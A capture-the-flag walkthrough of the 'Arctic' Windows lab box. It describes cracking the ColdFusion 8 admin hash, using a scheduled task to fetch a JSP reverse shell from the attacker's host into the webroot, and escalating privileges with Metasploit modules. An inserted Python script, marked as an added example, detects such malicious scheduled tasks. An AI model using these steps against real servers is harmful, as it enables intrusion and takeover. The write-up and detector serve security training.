Today, we’re going to solve another CTF machine, “Arctic”. It is now a retired box and is accessible to VIP members.

Specifications

  • Target OS: Windows
  • IP Address: 10.10.10.11
  • Difficulty: Easy

Contents

  • Getting user
  • Getting root

Reconnaissance

As always, the first step is the reconnaissance phase, starting with port scanning.

Ports Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address.

Enumeration

Nmap reveals an unknown service running on port 8500 and if we browse the page 10.10.10.11:8500

If we browse to CFIDE/ and take a look inside administrator/, it reveals the ‘Adobe Coldfusion 8 Administrator’ login page.

The first thing I did was test out basic creds which I could think of, such as admin:admin and admin:administrator. That didn’t work, so I checked the page source and inspected the input fields, but it was useless.

After that, Google for “Adobe Coldfusion 8 CVE”.

Exploit: https://www.exploit-db.com/exploits/14641

Crack SHA1 Using Hashcat

Password: 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03 / SHA1

Cracked: happyday

Go to Debugging & Logging > Scheduled Tasks

Let’s schedule a new task.

Exploitation

This gives us the ability to download a file from a web server and save it locally. Under Server Settings > Mapping, we can verify the CFIDE path. Since our target machine is Windows, we have to create a JSP reverse shell.

Task Name: Shell
URL: http://10.10.14.27:8000/shell.jsp
File: C:\ColdFusion8\wwwroot\CFIDE\shell.jsp

Click Submit and start the listener.

Click Run Scheduled Task

After running the scheduled task, we got a reverse shell.
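From the defender's side, the pattern above (a scheduled task that saves a fetched URL to a server-executable file inside the webroot) can be caught by auditing task definitions. The following is an added example, not part of the original write-up; the task record layout, the webroot constant, the extension list and the allowlisted host are assumptions for illustration.

```python
import ntpath
from urllib.parse import urlsplit

# Assumptions (not from the original page): webroot inferred from the File
# path used above; extension list, allowlist and record layout are illustrative.
WEBROOT = r"C:\ColdFusion8\wwwroot"
EXECUTABLE_EXTS = {".jsp", ".jspx", ".cfm", ".cfml", ".cfc"}
ALLOWED_HOSTS = {"reports.example.internal"}  # hypothetical trusted source

def under_webroot(path):
    """True if path resolves inside WEBROOT (handles '..', '/', mixed case)."""
    norm = ntpath.normcase(ntpath.normpath(path))
    root = ntpath.normcase(ntpath.normpath(WEBROOT))
    return norm == root or norm.startswith(root + "\\")

def audit_task(task):
    """Return a list of findings for one scheduled-task record."""
    findings = []
    out = task.get("file", "")
    if not out:
        return findings  # task does not save its output to disk
    ext = ntpath.splitext(out)[1].lower()
    host = urlsplit(task.get("url", "")).hostname or ""
    if under_webroot(out):
        if ext in EXECUTABLE_EXTS:
            findings.append("writes server-executable file into webroot")
        else:
            findings.append("writes into webroot")
    if host not in ALLOWED_HOSTS:
        findings.append(f"saves output fetched from non-allowlisted host {host}")
    return findings

# Sample records: the first mirrors the task shown above, the rest are constructed.
SAMPLE_TASKS = [
    {"name": "Shell", "url": "http://10.10.14.27:8000/shell.jsp",
     "file": r"C:\ColdFusion8\wwwroot\CFIDE\shell.jsp"},
    {"name": "DailyReport", "url": "https://reports.example.internal/daily",
     "file": r"D:\reports\daily.html"},
    {"name": "Sneaky", "url": "https://reports.example.internal/x",
     "file": "c:/coldfusion8/logs/../WWWROOT/cfide/x.CFM"},
]

if __name__ == "__main__":
    for t in SAMPLE_TASKS:
        for finding in audit_task(t):
            print(f"[!] task {t['name']!r}: {finding}")
```

Running a check like this against exported task definitions, alongside file-integrity monitoring on the webroot, surfaces the drop before the file is ever requested.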

User flag can be obtained from C:\Users\tolis\Desktop\user.txt

Privilege Escalation

Since we have a low-privilege shell, we can try upgrading to a proper shell and then go for privilege escalation.

Transfer our shell.exe file to the target box using PowerShell.

And we got a proper low-priv reverse shell.

Since we don’t know what to exploit for priv esc, we’ll do some enumeration, and the easiest way to do that in Metasploit is to use the local_exploit_suggester module.

Module: post/multi/recon/local_exploit_suggester

We got a bunch of suggestions through the x86 shell, but let’s see what we get through an x64 shell.

Now that we’re x64, let’s run local_exploit_suggester again.

Not much of a difference. Let’s try the first one (exploit/windows/local/ms10_092_schelevator).

Looks like it worked!